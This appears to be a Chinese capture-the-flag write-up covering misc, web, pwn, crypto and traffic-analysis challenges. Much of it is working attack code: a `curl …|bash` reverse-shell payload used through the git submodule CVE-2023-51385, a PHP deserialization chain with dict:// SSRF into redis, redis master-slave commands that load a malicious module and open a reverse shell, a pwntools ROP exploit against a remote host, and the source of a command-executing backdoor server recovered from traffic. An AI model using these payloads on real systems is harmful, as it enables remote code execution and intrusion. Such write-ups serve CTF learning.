import zipfile\n\nwith zipfile.ZipFile('\u5916\u5356\u7bb1.zip', 'r') as zip_file:\n file_names = zip_file.namelist()\n\n for file_name in file_names:\n utf8_file_name = file_name.encode('cp437').decode('gbk')\n\n print(utf8_file_name[6:-3])<\/code><\/pre>\n\u7136\u540e\u62fc\u63a5<\/p>\n
f = open("1.txt").readlines()\n\ndata = [""]*20000\nfor i in f:\n ii = i.split('_')\n data[int(ii[0])] = ii[1].strip()\nprint("".join(data))<\/code><\/pre>\n\u7136\u540ebase64\u6362\u8868<\/p>\n
import base64\n\nimport string\n\nstr1 = "UEsDBBQAAAAIAEVSIlgh03Nsb......AK1+AAAAAA==" # \u5bc6\u7801\n\nstring1 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789\/-" # \u88ab\u4fee\u6539\u540e\u7684\u7801\u8868\n\nstring2 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/" # \u6b63\u5e38\u7684\u7801\u8868\n\nprint(base64.b64decode(str1.translate(str.maketrans(string1, string2))).hex())<\/code><\/pre>\n\u91cc\u9762\u5f97\u5230\u7684\u4e1c\u897f\u76f4\u63a5\u62ff\u6765\u660e\u6587\u653b\u51fb\uff0c\u7167\u7740\u94a5\u5319.png\u914d\u7f6e\uff0c\u4f7f\u7528bandizip\u538b\u7f29<\/p>\n
\u7136\u540e\u62fc\u63a5\u4e24\u6bb5flag\u5373\u53ef<\/p>\n
modules<\/h3>\n
CVE-2023-51385\uff0c\u76f4\u63a5\u6253\u5c31\u597d\u4e86\uff0cgithub\u7528\u4e0d\u4e86\u7528gitee<\/p>\n
\u6ce8\u610f\u6700\u540e\u7684.gitxxx\u90a3\u4e2a\u6587\u4ef6\u91cc\u9762\u7684payload\u4f3c\u4e4e\u4e0d\u80fd\u6709\u5192\u53f7\u659c\u6760\u4e4b\u7c7b\u7684\uff0c\u4f1a\u5bfc\u81f4\u89e3\u6790\u51fa\u95ee\u9898<\/p>\n
\u8fd9\u91cc\u76f4\u63a5\u628a\u53cd\u5f39shell\u7684\u547d\u4ee4\u5199\u8fdbindex.html\uff0c\u7136\u540evps\u572880\u7aef\u53e3\u5f00\u4e00\u4e2apython\u7684httpserver<\/p>\n
\u7136\u540epayload\u5982\u4e0b<\/p>\n
`curl xx.xx.xx.xx|bash`<\/code><\/pre>\n\u76f4\u63a5\u5c31\u53ef\u4ee5\u6536\u5230shell<\/p>\n
\u660e\u6587\u6df7\u6dc6<\/h3>\n
\u5148\u662f\u660e\u6587\u653b\u51fb\uff0c\u76f4\u63a5google\u641c\u4e00\u4e0b\u90a3\u4e2a\u957f\u5ea6\u7684license.txt\uff0c\u627e\u5230\u4e2a\u4e00\u6837\u7684\uff0c\u4f46\u662fcrc\u4e0d\u540c\uff0c\u53ef\u80fd\u7248\u672c\u4e0d\u4e00\u6837\uff0c\u76f4\u63a5\u7528\u4ed6\u7684\u5934\u6765\u660e\u6587\u653b\u51fb<\/p>\n
GNU GENERAL PUBLIC LICENSE<\/code><\/pre>\n\u7136\u540e\u62ff\u5230\u6df7\u6dc6\u7684webshell\u6ca1\u4ec0\u4e48\u597d\u8bf4\u7684\uff0c\u624b\u89e3\u4e24\u5c42\u5c31\u597d\u4e86<\/p>\n
Web<\/h2>\nezezez_php<\/h3>\n
Poc\u7c7b\u7684getflag\u65b9\u6cd5\u770b\u4e86\u534a\u5929\u5e94\u8be5\u662f\u4e0d\u597d\u89e6\u53d1\uff0c\u4f46\u662f\u4f3c\u4e4e\u53ef\u4ee5\u7528Er\u91cc\u7684__set\u65b9\u6cd5\u53bb\u8bfb\u53d6\u4e00\u4e9b\u4e1c\u897f\uff0c\u6bd4\u5982hint\u91cc\u7684redis\u4e4b\u7c7b\u7684<\/p>\n
\u53ef\u4ee5\u627e\u5230\u4e00\u6761\u94fe\u5b50<\/p>\n
Ha(__destruct()) --> Rd(__call) --> Er(__set)<\/code><\/pre>\nexp:<\/p>\n
<?php\n\nclass Rd\n{\n public $ending;\n public $cl;\n\n public $poc;\n\n public function __destruct()\n {\n echo "All matters have concluded"."<\/br>";\n }\n\n public function __call($name, $arg)\n {\n foreach ($arg as $key => $value) {\n\n if ($arg[0]['POC'] == "0.o") {\n $this->cl->var1 = "get";\n }\n }\n }\n}\n\nclass Er\n{\n public $symbol;\n public $Flag;\n\n public function __construct()\n {\n $this->symbol = True;\n }\n\n public function __set($name, $value)\n { \n if (preg_match('\/^(http|https|gopher|dict)?:\\\/\\\/.*(\\\/)?.*$\/',base64_decode($this->Flag))){\n $value($this->Flag);\n }\n else {\n echo "NoNoNo,please you can look hint.php"."<\/br>";\n }\n }\n\n}\n\nclass Ha\n{\n public $start;\n public $start1;\n public $start2="o.0";\n\n public function __construct()\n {\n echo $this->start1 . "__construct" . "<\/br>";\n }\n\n public function __destruct()\n {\n if ($this->start2 === "o.0") {\n $this->start1->Love($this->start);\n echo "You are Good!"."<\/br>";\n }\n }\n}\n\n$a = new Rd();\n$b = new Er();\n$c = new Ha();\n$b->Flag=base64_encode("dict:\/\/127.0.0.1:6379\/info");\n$a->cl=$b;\n$c->start1=$a;\n$c->start=array("POC"=>"0.o");\n\necho urlencode(serialize($c));<\/code><\/pre>\n\u7136\u540e\u901a\u8fc7dict:\/\/127.0.0.1:6379\/ping\u5c31\u77e5\u9053\u5185\u7f51\u7684redis\u6709\u672a\u6388\u6743<\/p>\n
\u76f4\u63a5\u4e3b\u4ece\u590d\u5236<\/p>\n
\u8fd9\u7bc7\u6587\u7ae0\u8bb2\u4e86\u4e3b\u4ece\u590d\u5236\u7684\u624b\u52a8\u89e6\u53d1\u65b9\u6cd5<\/p>\n
https:\/\/www.cnblogs.com\/xiaozi\/p\/13089906.html<\/a><\/p>\n#\u8bbe\u7f6eredis\u7684\u5907\u4efd\u8def\u5f84\u4e3a\u5f53\u524d\u76ee\u5f55\n config set dir \/tmp\n#\u8bbe\u7f6e\u5907\u4efd\u6587\u4ef6\u540d\u4e3aexp.so\uff0c\u9ed8\u8ba4\u4e3adump.rdb\n config set dbfilename exp.so\n#\u8bbe\u7f6e\u4e3b\u670d\u52a1\u5668IP\u548c\u7aef\u53e3\n slaveof 192.168.172.129 1234 \n#\u52a0\u8f7d\u6076\u610f\u6a21\u5757\n module load \/tmp\/exp.so\n#\u5207\u65ad\u4e3b\u4ece\uff0c\u5173\u95ed\u590d\u5236\u529f\u80fd\n slaveof no one \n#\u6267\u884c\u7cfb\u7edf\u547d\u4ee4\n system.exec 'whoami'\n system.rev 127.0.0.1 9999 <\/code><\/pre>\n\u76f4\u63a5\u4e00\u6761\u6761\u8f93\u5165\u5c31\u5b8c\u4e86\uff0c\u6700\u540eflag\u5728env\u91cc<\/p>\n
Pwn<\/h2>\nnmanager<\/h3>\nfrom pwn import *\n\n#p = process(".\/nmanager")\np = remote("8.147.131.156", 19723)\n\np.sendlineafter(b'input password:',b'A' * 96 + b'check passed')\n\n#gdb.attach(p)\n#pause()\n\np.sendlineafter(b'modify ##',b'8')\np.sendafter(b'gender:',b'A' * 0x8)\np.sendlineafter(b'age:',b'4294967295')\np.sendafter(b'name',b'A' * 0x40)\n\n#p.sendafter(b'(Y\/y)',b'n\\x00')\n\nlibc_base = u64(p.recvuntil(b'\\x7f')[-6:].ljust(8,b'\\x00')) - 0x29d90\nsuccess("libc:" + hex(libc_base))\n\npop_rdi = libc_base + 0x000000000002a3e5 \nret = libc_base + 0x0000000000029cd6\n\nsystem = libc_base + 0x000000000050d60\nbin_sh = libc_base + 0x1D8698\n\np.sendafter(b'(Y\/y)',b'n\\x00')\np.sendlineafter(b'modify ##',b'8')\np.sendafter(b'gender:',b'A' * 0x8 + p64(libc_base + 0x0002a3e1)) #pop3\np.sendlineafter(b'age:',b'4294967295')\n\nr = b''\nr += p64(pop_rdi)\nr += p64(bin_sh)\nr += p64(ret)\nr += p64(system)\n\np.sendafter(b'name',r)\np.sendafter(b'(Y\/y)',b'y\\x00')\n\np.interactive()<\/code><\/pre>\nCrypto<\/h2>\nCF is Crypto Faker<\/h3>\n
\u62bd\u8c61\uff0c\u4e0d\u597d\u8bc4\u4ef7<\/p>\n
from Crypto.PublicKey import RSA\nfrom Crypto.Util.number import *\nimport gmpy2\n\ne = 0x2c22193ad9abcca2f67552fc76dd07b3ef883f3d755c95119cdf82bb6a07c970fd37e582bb49250d8efaa29b8a59c82059165c654206a9d7261f6b45a90dc69\nphi = 0x81c5f040bfaea676120cd62c36ba7afb303561504bbf8609afa3da60fb6202ca875b0bd2a06143ebcd16fa615557ff159d97909160d68e1938b3ecaf57709b3bb712fdcba325655f111918472d4353a66854ccda50b63a1047278c15a4b39cde898d054db87092958c7c05f8fa566dcd969b1ff4b7d1935c375a4af3bfc341b0\nn = 0x81c5f040bfaea676120cd62c36ba7afb303561504bbf8609afa3da60fb6202ca875b0bd2a06143ebcd16fa615557ff159d97909160d68e1938b3ecaf57709b3d2698476b6dd203811b6a2ec6a6e2a7e213ab719bcd3ab49bb864b10e9c78ea3f501c0e2213dfe431043bb6f0cc2e8d77bfb43869b843af1a99ae81b87811e101\nc1 = 0x29289e3d9275147b885b5061637564cbee3e4d9f48e52694e594f020e49da9b24d9246b2437fb2221fa86ca1a277f3fdd7ab5cad4738a02b66d47703ef816844a84c6c209c8251e8961c9ba2c791649e022627f86932d9700c3b1dc086e8b2747d0a5604955387a935464d3866dd4100b2f3d57603c728761d1d8ef7fdbdcbee\nc2 = 0x2b0059f88454e0e36269c809b5d5b6b28e5bab3c87b20f9e55635239331100a0a582241e7a385034698b61ebf24b519e868617ff67974cc907cc61be38755737f9a6dbeb7890ff55550b1af1ecf635112fcaaa8b07a3972b3c6728cbcf2a3973a4d7bd92affec7e065e0ae83cd36858e6d983785a3668a8b82709d78a69796af\nciphertext = 0x775cbee546e7579f0a69645b59f72f5c8ff0c538dd9a6e755969dee2ffb8748073c089557801dfb8bfae15baba9a909f3addac142ad928ac7cc453c72166dda235128de12965df4308997416e054ab1ab9af55c60533c7374096aa2d05339900b3e14f7148930bf083eb1eb9fa22b9a997f85b39501d3a9bdfa08e3389b8f2fe\n\nd = gmpy2.invert(e, phi)\nm1 = pow(c1, d, n)\nm2 = pow(c2, d, n)\nm3 = pow(ciphertext, d, n)\nprint(long_to_bytes(m1))\nprint(long_to_bytes(m2))\nprint(long_to_bytes(m3))<\/code><\/pre>\nnot_wiener<\/h3>\n
\u8d77\u624b\u6253\u4e00\u4e2aBoneh_Durfee's attack\u7684\u677f\u5b50\uff0c\u6ce8\u610f\u8c03\u6574delta\u53c2\u6570\u7684\u503c\u548c\u683c\u5b50\u7684\u7ef4\u6570m<\/p>\n
#sage\nimport time\n\n############################################\n# Config\n##########################################\n\n"""\nSetting debug to true will display more informations\nabout the lattice, the bounds, the vectors...\n"""\ndebug = True\n\n"""\nSetting strict to true will stop the algorithm (and\nreturn (-1, -1)) if we don't have a correct\nupperbound on the determinant. Note that this\ndoesn't necesseraly mean that no solutions\nwill be found since the theoretical upperbound is\nusualy far away from actual results. That is why\nyou should probably use `strict = False`\n"""\nstrict = False\n\n"""\nThis is experimental, but has provided remarkable results\nso far. It tries to reduce the lattice as much as it can\nwhile keeping its efficiency. I see no reason not to use\nthis option, but if things don't work, you should try\ndisabling it\n"""\nhelpful_only = True\ndimension_min = 7 # stop removing if lattice reaches that dimension\n\n############################################\n# Functions\n##########################################\n\n# display stats on helpful vectors\ndef helpful_vectors(BB, modulus):\n nothelpful = 0\n for ii in range(BB.dimensions()[0]):\n if BB[ii,ii] >= modulus:\n nothelpful += 1\n\n print(nothelpful, "\/", BB.dimensions()[0], " vectors are not helpful")\n\n# display matrix picture with 0 and X\ndef matrix_overview(BB, bound):\n for ii in range(BB.dimensions()[0]):\n a = ('%02d ' % ii)\n for jj in range(BB.dimensions()[1]):\n a += '0' if BB[ii,jj] == 0 else 'X'\n if BB.dimensions()[0] < 60:\n a += ' '\n if BB[ii, ii] >= bound:\n a += '~'\n print(a)\n\n# tries to remove unhelpful vectors\n# we start at current = n-1 (last vector)\ndef remove_unhelpful(BB, monomials, bound, current):\n # end of our recursive function\n if current == -1 or BB.dimensions()[0] <= dimension_min:\n return BB\n\n # we start by checking from the end\n for ii in range(current, -1, -1):\n # if it is unhelpful:\n if BB[ii, ii] >= bound:\n affected_vectors = 0\n affected_vector_index = 0\n # let's check if it affects other vectors\n for jj in range(ii + 1, BB.dimensions()[0]):\n # if another vector is affected:\n # we increase the count\n if BB[jj, ii] != 0:\n affected_vectors += 1\n affected_vector_index = jj\n\n # level:0\n # if no other vectors end up affected\n # we remove it\n if affected_vectors == 0:\n print("* removing unhelpful vector", ii)\n BB = BB.delete_columns([ii])\n BB = BB.delete_rows([ii])\n monomials.pop(ii)\n BB = remove_unhelpful(BB, monomials, bound, ii-1)\n return BB\n\n # level:1\n # if just one was affected we check\n # if it is affecting someone else\n elif affected_vectors == 1:\n affected_deeper = True\n for kk in range(affected_vector_index + 1, BB.dimensions()[0]):\n # if it is affecting even one vector\n # we give up on this one\n if BB[kk, affected_vector_index] != 0:\n affected_deeper = False\n # remove both it if no other vector was affected and\n # this helpful vector is not helpful enough\n # compared to our unhelpful one\n if affected_deeper and abs(bound - BB[affected_vector_index, affected_vector_index]) < abs(bound - BB[ii, ii]):\n print("* removing unhelpful vectors", ii, "and", affected_vector_index)\n BB = BB.delete_columns([affected_vector_index, ii])\n BB = BB.delete_rows([affected_vector_index, ii])\n monomials.pop(affected_vector_index)\n monomials.pop(ii)\n BB = remove_unhelpful(BB, monomials, bound, ii-1)\n return BB\n # nothing happened\n return BB\n\n"""\nReturns:\n* 0,0 if it fails\n* -1,-1 if `strict=true`, and determinant doesn't bound\n* x0,y0 the solutions of `pol`\n"""\ndef boneh_durfee(pol, modulus, mm, tt, XX, YY):\n """\n Boneh and Durfee revisited by Herrmann and May\n\n finds a solution if:\n * d < N^delta\n * |x| < e^delta\n * |y| < e^0.5\n whenever delta < 1 - sqrt(2)\/2 ~ 0.292\n """\n\n # substitution (Herrman and May)\n PR.<u, x, y> = PolynomialRing(ZZ)\n Q = PR.quotient(x*y + 1 - u) # u = xy + 1\n polZ = Q(pol).lift()\n\n UU = XX*YY + 1\n\n # x-shifts\n gg = []\n for kk in range(mm + 1):\n for ii in range(mm - kk + 1):\n xshift = x^ii * modulus^(mm - kk) * polZ(u, x, y)^kk\n gg.append(xshift)\n gg.sort()\n\n # x-shifts list of monomials\n monomials = []\n for polynomial in gg:\n for monomial in polynomial.monomials():\n if monomial not in monomials:\n monomials.append(monomial)\n monomials.sort()\n\n # y-shifts (selected by Herrman and May)\n for jj in range(1, tt + 1):\n for kk in range(floor(mm\/tt) * jj, mm + 1):\n yshift = y^jj * polZ(u, x, y)^kk * modulus^(mm - kk)\n yshift = Q(yshift).lift()\n gg.append(yshift) # substitution\n\n # y-shifts list of monomials\n for jj in range(1, tt + 1):\n for kk in range(floor(mm\/tt) * jj, mm + 1):\n monomials.append(u^kk * y^jj)\n\n # construct lattice B\n nn = len(monomials)\n BB = Matrix(ZZ, nn)\n for ii in range(nn):\n BB[ii, 0] = gg[ii](0, 0, 0)\n for jj in range(1, ii + 1):\n if monomials[jj] in gg[ii].monomials():\n BB[ii, jj] = gg[ii].monomial_coefficient(monomials[jj]) * monomials[jj](UU,XX,YY)\n\n # Prototype to reduce the lattice\n if helpful_only:\n # automatically remove\n BB = remove_unhelpful(BB, monomials, modulus^mm, nn-1)\n # reset dimension\n nn = BB.dimensions()[0]\n if nn == 0:\n print("failure")\n return 0,0\n\n # check if vectors are helpful\n if debug:\n helpful_vectors(BB, modulus^mm)\n\n # check if determinant is correctly bounded\n det = BB.det()\n bound = modulus^(mm*nn)\n if det >= bound:\n print("We do not have det < bound. Solutions might not be found.")\n print("Try with highers m and t.")\n if debug:\n diff = (log(det) - log(bound)) \/ log(2)\n print("size det(L) - size e^(m*n) = ", floor(diff))\n if strict:\n return -1, -1\n else:\n print("det(L) < e^(m*n) (good! If a solution exists < N^delta, it will be found)")\n\n # display the lattice basis\n if debug:\n matrix_overview(BB, modulus^mm)\n\n # LLL\n if debug:\n print("optimizing basis of the lattice via LLL, this can take a long time")\n\n BB = BB.LLL()\n\n if debug:\n print("LLL is done!")\n\n # transform vector i & j -> polynomials 1 & 2\n if debug:\n print("looking for independent vectors in the lattice")\n found_polynomials = False\n\n for pol1_idx in range(nn - 1):\n for pol2_idx in range(pol1_idx + 1, nn):\n # for i and j, create the two polynomials\n PR.<w,z> = PolynomialRing(ZZ)\n pol1 = pol2 = 0\n for jj in range(nn):\n pol1 += monomials[jj](w*z+1,w,z) * BB[pol1_idx, jj] \/ monomials[jj](UU,XX,YY)\n pol2 += monomials[jj](w*z+1,w,z) * BB[pol2_idx, jj] \/ monomials[jj](UU,XX,YY)\n\n # resultant\n PR.<q> = PolynomialRing(ZZ)\n rr = pol1.resultant(pol2)\n\n # are these good polynomials?\n if rr.is_zero() or rr.monomials() == [1]:\n continue\n else:\n print("found them, using vectors", pol1_idx, "and", pol2_idx)\n found_polynomials = True\n break\n if found_polynomials:\n break\n\n if not found_polynomials:\n print("no independant vectors could be found. This should very rarely happen...")\n return 0, 0\n\n rr = rr(q, q)\n\n # solutions\n soly = rr.roots()\n\n if len(soly) == 0:\n print("Your prediction (delta) is too small")\n return 0, 0\n\n soly = soly[0][0]\n ss = pol1(q, soly)\n solx = ss.roots()[0][0]\n\n #\n return solx, soly\n\ndef example():\n ############################################\n # How To Use This Script\n ##########################################\n\n #\n # The problem to solve (edit the following values)\n #\n\n # the modulus\n N = \n\n # the public exponent\n e = \n\n # the hypothesis on the private exponent (the theoretical maximum is 0.292)\n delta = 0.28 # this means that d < N^delta\n\n #\n # Lattice (tweak those values)\n #\n\n # you should tweak this (after a first run), (e.g. increment it until a solution is found)\n m = 8 # size of the lattice (bigger the better\/slower)\n\n # you need to be a lattice master to tweak these\n t = int((1-2*delta) * m) # optimization from Herrmann and May\n X = 2*floor(N^delta) # this _might_ be too much\n Y = floor(N^(1\/2)) # correct if p, q are ~ same size\n\n #\n # Don't touch anything below\n #\n\n # Problem put in equation\n P.<x,y> = PolynomialRing(ZZ)\n A = int((N+1)\/2)\n pol = 1 + x * (A + y)\n\n #\n # Find the solutions!\n #\n\n # Checking bounds\n if debug:\n print("=== checking values ===")\n print("* delta:", delta)\n print("* delta < 0.292", delta < 0.292)\n print("* size of e:", int(log(e)\/log(2)))\n print("* size of N:", int(log(N)\/log(2)))\n print("* m:", m, ", t:", t)\n\n # boneh_durfee\n if debug:\n print("=== running algorithm ===")\n start_time = time.time()\n\n solx, soly = boneh_durfee(pol, e, m, t, X, Y)\n\n # found a solution?\n if solx > 0:\n print("=== solution found ===")\n if False:\n print("x:", solx)\n print("y:", soly)\n\n d = int(pol(solx, soly) \/ e)\n print("private key found:", d)\n else:\n print("=== no solution was found ===")\n\n if debug:\n print("=== %s seconds ===" % (time.time() - start_time))\n\nif __name__ == "__main__":\n example()<\/code><\/pre>\n\u62ff\u5230a\u53c2\u6570\uff0c\u540e\u534a\u6bb5\u662f\u5171\u4eabk\u7684DSA\uff0c\u7b80\u5355\u63a8\u5f0f\u5b50<\/p>\n
$$s{1}k<\/em>{1}=h{1}+xr<\/em>{1}$$<\/p>\n$$as{2}k<\/em>{1}+bs{2}=h<\/em>{2}+xr_{2}$$<\/p>\n$$x=(r{2}s<\/em>{1}-ar{1}s<\/em>{2})^{-1}*(ah{1}s<\/em>{2}+bs{1}s<\/em>{2}-s{1}h<\/em>{2})$$<\/p>\nexp:<\/p>\n
from Crypto.Util.number import *\nimport gmpy2\n\nd = 1493519932573300884636712093929290985070801830526216141153447882450934993737739146621\nn = 98871082998654651904594468693622517613869880791884929588100914778964766348914919202255397776583412976785216592924335179128220634848871563960167726280836726035489482233158897362166942091133366827965811201438682117312550600943385153640907629347663140487841016782054145413246763816202055243693289693996466579973\ne = 76794907644383980853714814867502708655721653834095293468287239735547303515225813724998992623067007382800348003887194379223500764768679311862929538017193078946067634221782978912767213553254272722105803768005680182504500278005295062173004098796746439445343896868825218704046110925243884449608326413259156482881\nc = 13847199761503953970544410090850216804358289955503229676987212195445226107828814170983735135692611175621170777484117542057117607579344112008580933900051471041224296342157618857321522682033260246480258856376097987259016643294843196752685340912823459403703609796624411954082410762846356541101561523204985391564\na = pow(c,d,n)\n\np= 161310487790785086482919800040790794252181955976860261806376528825054571226885460699399582301663712128659872558133023114896223014064381772944582265101778076462675402208451386747128794418362648706087358197370036248544508513485401475977401111270352593919906650855268709958151310928767086591887892397722958234379\nq= 1115861146902610160756777713087325311747309309771\ng= 61073566757714587321114447684333928353300944355112378054603585955730395524359123615359185275743626350773632555967063692889668342544616165017003197599818881844811647270423070958521148291118914198811187731689123176313367399492561288350530256722898205674043032421874788802819858438796795768177550638273020791962\ny= 23678147495254433946472657196764372220306841739888385605070426528738230369489739339976134564575544246606937803367113623097260181789372915552172469427842482448570540429192377881186772226796452797182435452490307834205012154495575570994963829345053331967442452842152258650027916313982835119514473311305158299360\n(h1, r1, s1) = 535874494834828755542711401117152397489711233142, 117859946800380767356190121030392492081340616512, 26966646740134065096660259687229179143947213779\n(h2, r2, s2) = 236574518096866758760287021848258048065293279716, 863199000523521111517835459866422731857447792677, 517924607931342012033031470185302567344725962419\nb= 17474742587088593627\n\nx = ((h1*s2*a+b*s1*s2-h2*s1)*(gmpy2.invert(s1*r2-r1*s2*a,q)))%q\nprint(long_to_bytes(x))<\/code><\/pre>\n\u53ef\u4fe1\u8ba1\u7b97<\/h2>\n
\u4f20\u7edf\u827a\u80fd(<\/p>\n
![\"\"](\"https:\/\/pic.imgdb.cn\/item\/65ae0bf1871b83018a6a0616.jpg\")
<\/p>\n
\u6311\u6218\u9898<\/h2>\n\u52d2\u7d22\u6d41\u91cf<\/h3>\n
\u8681\u5251\u6d41\u91cf\uff0c\u7b80\u5355\u89e3\u89e3base64<\/p>\n
\u51e0\u4e2a\u91cd\u8981\u6587\u4ef6\u4f4d\u7f6e\uff1a<\/p>\n
server.py: tcp.stream eq 49<\/p>\n
![\"\"](\"https:\/\/pic.imgdb.cn\/item\/65ae6629871b83018aad055f.jpg\")
<\/p>\n
s3cret.txt: tcp.stream eq 48<\/p>\n
![\"\"](\"https:\/\/pic.imgdb.cn\/item\/65ae671c871b83018ab18e4e.jpg\")
<\/p>\n
\u89e3\u4e00\u4e0bbase64\u5728\u53bb\u6389\u540e\u9762\u7684\u5197\u4f59\u6570\u636e<\/p>\n
![\"\"](\"https:\/\/pic.imgdb.cn\/item\/65ae6709871b83018ab132f0.jpg\")
<\/p>\n
server.py\u5982\u4e0b<\/p>\n
import socket\nfrom Crypto.Cipher import ARC4\nimport base64\nimport os\nimport json\nimport hashlib\n\ndef calculate_md5(string):\n md5_hash = hashlib.md5()\n md5_hash.update(string.encode('utf-8'))\n md5_hex = md5_hash.hexdigest()\n return md5_hex\n\nfrom Crypto.Cipher import ARC4\nimport base64\nimport json\n\nwith open(".\/s3creT.txt", "r") as f:\n key = f.read()\nkey = calculate_md5(key)\n\ndef rc4_encrypt(data, key1):\n key = bytes(key1, encoding='utf-8')\n enc = ARC4.new(key)\n res = enc.encrypt(data.encode('utf-8'))\n res = base64.b64encode(res)\n res = str(res, 'utf-8')\n return res\n\ndef rc4_decrypt(data, key1):\n data = base64.b64decode(data)\n key = bytes(key1, encoding='utf-8')\n enc = ARC4.new(key)\n res = enc.decrypt(data)\n res = str(res, 'gbk', errors='ignore')\n return res\n\ndef t1(data):\n import re\n from datetime import datetime, timedelta\n current_time = datetime.now()\n target_time = current_time.replace(second=0, microsecond=0)\n timestamp = int(target_time.timestamp())\n key1 = hex(timestamp)[2:].zfill(8)\n key1 = re.findall(r'.{2}', key1)\n key1 = [int(i, 16) for i in key1]\n data = list(data)\n for i in range(len(data)):\n data[i] = chr(ord(data[i]) ^ key1[i % 4])\n data = ''.join(data)\n return data\n\ndef decrypt(data, key):\n data = t1(data)\n data = rc4_decrypt(data, key)\n return data\n\ndef encrypt(data, key):\n data = rc4_encrypt(data, key)\n data = t1(data)\n\n return data\n\ndef system(cmd):\n res = os.popen(cmd).read()\n return res if res else "NoneResult"\n\ndef main():\n ip = '192.168.31.42'\n port = 8899\n socket_server = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)\n socket_server.bind((ip, port))\n socket_server.listen(1)\n while True:\n conn, addr = socket_server.accept()\n with conn:\n print("connect::", addr)\n try:\n while True:\n data = conn.recv(102400)\n # print("server recevie peername and data:", conn.getpeername(), data.decode())\n if data:\n data = data.decode()\n data = decrypt(data, key)\n data = json.loads(data)\n if data["opcode"] == "shell":\n print("shellCMD::", data["msg"])\n res = system(data["msg"])\n print("res::", res)\n conn.sendall(encrypt(res, key).encode())\n else:\n break\n except ConnectionResetError as e:\n print("\u8fdc\u7a0b\u8fde\u63a5\u65ad\u5f00")\n\nif __name__ == '__main__':\n main()<\/code><\/pre>\n\u7b80\u5355\u770b\u770b\u5c31\u662frc4\u548c\u4e0e\u65f6\u95f4\u6233\u76f8\u5f02\u6216\u4e00\u8d77\u7528<\/p>\n
\u76f4\u63a5\u8fde\u89e3\u5bc6\u90fd\u7ed9\u4e86\uff0c\u592a\u8d34\u5fc3\u4e86<\/p>\n
\u76f4\u63a5\u89e3\u5bc6\u5c31\u597d\u4e86<\/p>\n
\u65f6\u95f4\u6233\u6765\u81eaepoch time\uff0c\u7531\u4e8e\u79d2\u6570\u5728\u8fd9\u91cc\u662f\u88ab\u5220\u6389\u7684\uff0c\u6240\u4ee5\u6bcf\u5206\u949f\u4e00\u53d8\uff0c\u9700\u8981\u5bf9\u62ff\u5230\u7684\u65f6\u95f4\u6233\u8fdb\u884c\u8fd9\u6837\u7684\u5904\u7406<\/p>\n
timestamp = timestamp - (timestamp % 60)<\/code><\/pre>\n\u7136\u540e\u76f4\u63a5\u627e\u53d1\u9001\u6216\u8005\u63a5\u6536\u7aef\u4e3a8899\u7684\u6d41\u91cf<\/p>\n
tcp.srcport == 8899 or tcp.dstport == 8899<\/code><\/pre>\n\u4f46\u662f\u540e\u6765\u53c8\u6362\u6210\u4e869999\u7aef\u53e3<\/p>\n
tcp.srcport == 9999 or tcp.dstport == 9999<\/code><\/pre>\n\u8fd9\u91cc\u7684\u6d41\u91cf\u4f20\u8f93\u662f\u6709\u4e00\u79cd\u7279\u6b8a\u7684\u7f16\u7801\u65b9\u5f0f\u7684\uff0c\u5fd8\u4e86\u53eb\u4ec0\u4e48\u4e86\uff0c\u603b\u4e4b\u9700\u8981\u628a\u6d41\u91cf\u91cc\u9762\u591a\u4f59\u76840xc2\u548c0xc3\u53bb\u6389\u5e76\u4e14\u628a0xc3\u540e\u9762\u7684\u6570\u636e\u503c+64<\/p>\n
\u6062\u590d\u539f\u6d41\u91cf\u811a\u672c\uff1a<\/p>\n
text = bytes.fromhex(\n "16c3b2c295c3be04c29cc29fc3a90cc39ec2a3c39937c391c3a7c3811cc38bc3a0c39b29c29ac2b1c3b830c3b2c286c3a13cc38ac296c38d13c3a2c29dc3920bc3bac2a8c2bb22c29bc287c3a328c3afc29cc3bd27c390c3a6c38110c381c2a5c381")\n\ni = 0\nout = []\nwhile i < len(text):\n if (text[i] == 194):\n out.append(text[i+1])\n i += 2\n continue\n\n elif (text[i] == 195):\n out.append(text[i+1]+64)\n i += 2\n continue\n\n else:\n out.append(text[i])\n i += 1\n continue\nfor i in out:\n print(hex(i)[2:].zfill(2), end='')<\/code><\/pre>\n\u89e3\u5bc6\u811a\u672c\uff1a<\/p>\n
import socket\nfrom Crypto.Cipher import ARC4\nimport base64\nimport os\nimport json\nimport hashlib\n\ndef calculate_md5(string):\n md5_hash = hashlib.md5()\n md5_hash.update(string.encode('utf-8'))\n md5_hex = md5_hash.hexdigest()\n return md5_hex\n\nkey = calculate_md5("R@ns0mwar3_V1ru5")\n\ndef rc4_encrypt(data, key1):\n key = bytes(key1, encoding='utf-8')\n enc = ARC4.new(key)\n res = enc.encrypt(data.encode('utf-8'))\n res = base64.b64encode(res)\n res = str(res, 'utf-8')\n return res\n\ndef rc4_decrypt(data, key1):\n data = base64.b64decode(data)\n key = bytes(key1, encoding='utf-8')\n enc = ARC4.new(key)\n res = enc.decrypt(data)\n res = str(res, 'gbk', errors='ignore')\n return res\n\ndef t1(data):\n import re\n from datetime import datetime, timedelta\n current_time = datetime.now()\n print(current_time)\n target_time = current_time.replace(second=0, microsecond=0)\n timestamp = int(target_time.timestamp())\n timestamp = 1705562630\n timestamp = timestamp - (timestamp % 60) + 180\n key1 = hex(timestamp)[2:].zfill(8)\n key1 = re.findall(r'.{2}', key1)\n print(key1)\n key1 = [int(i, 16) for i in key1]\n data = list(data)\n for i in range(len(data)):\n data[i] = chr(data[i] ^ key1[i % 4])\n data = "".join(data)\n print(data)\n return data\n\ndef decrypt(data, key):\n data = t1(data)\n data = rc4_decrypt(data, key)\n return data\n\ndata = bytes.fromhex(\n "16f295fe049c9fe90cdea3d937d1e7c11ccbe0db299ab1f830f286e13cca96cd13e29dd20bfaa8bb229b87e328ef9cfd27d0e6c110c1a5c1")\nprint(decrypt(data, key))<\/code><\/pre>\nezdede<\/h3>\n
\u7ed3\u5408\u4e86\u4e24\u4e2a\u8001\u6d1e\u5c45\u7136\u7ed9\u8fc7\u4e86(<\/p>\n